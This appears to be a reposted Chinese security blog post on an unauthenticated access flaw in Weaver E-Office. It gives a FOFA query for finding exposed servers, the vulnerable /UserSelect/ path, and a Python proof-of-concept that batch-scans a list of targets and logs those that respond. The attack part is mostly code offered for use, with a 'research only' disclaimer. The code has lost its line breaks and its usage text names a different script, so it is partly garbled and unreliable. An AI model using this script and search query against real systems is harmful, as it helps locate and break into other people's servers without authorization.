一、fofa查询
app="泛微-EOffice"
二、漏洞位置
http://xx.xx.xx.xx:xx/UserSelect/
三、批量检测
python .unAuthPOC.py -f 文件名
单个检测
python .unAuthPOC.py -u 检测目标
完整检测POC
# _*_ coding:utf-8 _*_# @Time : 2023/8/3 23:04# @Author: 微信公众号 安全透视镜import requestsimport argparseimport threadingrequests.packages.urllib3.disable_warnings()def usage():print('''+-----------------------------------------------------------------+微信公众号 网络安全透视镜使用方法:单个 python3 e-cology9_sqlcheck.py -u url[例 http://127.0.0.1:8080]批量 python3 e-cology9_sqlcheck.py -f filename+-----------------------------------------------------------------+''')#proxies = {'http':'http://127.0.0.1:8080'}def poc(target):headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',}try:if 'https' in target:url = targetelif 'http' in target:url = targetelse:url = 'http://'+ targeturl = url + "/UserSelect/ "response = requests.get(url,headers=headers,timeout=3)#print(f"访问 {url} 的响应状态码:{response.status_code}")if response.status_code == 200:print(f"{url} 存在未授权访问漏洞")with open('unAuth_ok.txt',mode='a',encoding='utf-8') as f2:f2.write(url+'n')except Exception as e:print(f"{url}无法访问")def run(filepath):urls = [x.strip() for x in open(filepath, "r").readlines()]# 设置线程数量for u in urls:poc(u)def main():parse = argparse.ArgumentParser()parse.add_argument("-u", "--url", help="python e-cology9_sqlcheck.py -u url")parse.add_argument("-f", "--file", help="python e-cology9_sqlcheck.py -f file")args = parse.parse_args()url = args.urlfilepath = args.fileif url is not None and filepath is None:poc(url)elif url is None and filepath is not None:run(filepath)else:usage()if __name__ == '__main__':main()
原文始发于微信公众号(网络安全透视镜):泛微E-Office 未授权访问
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论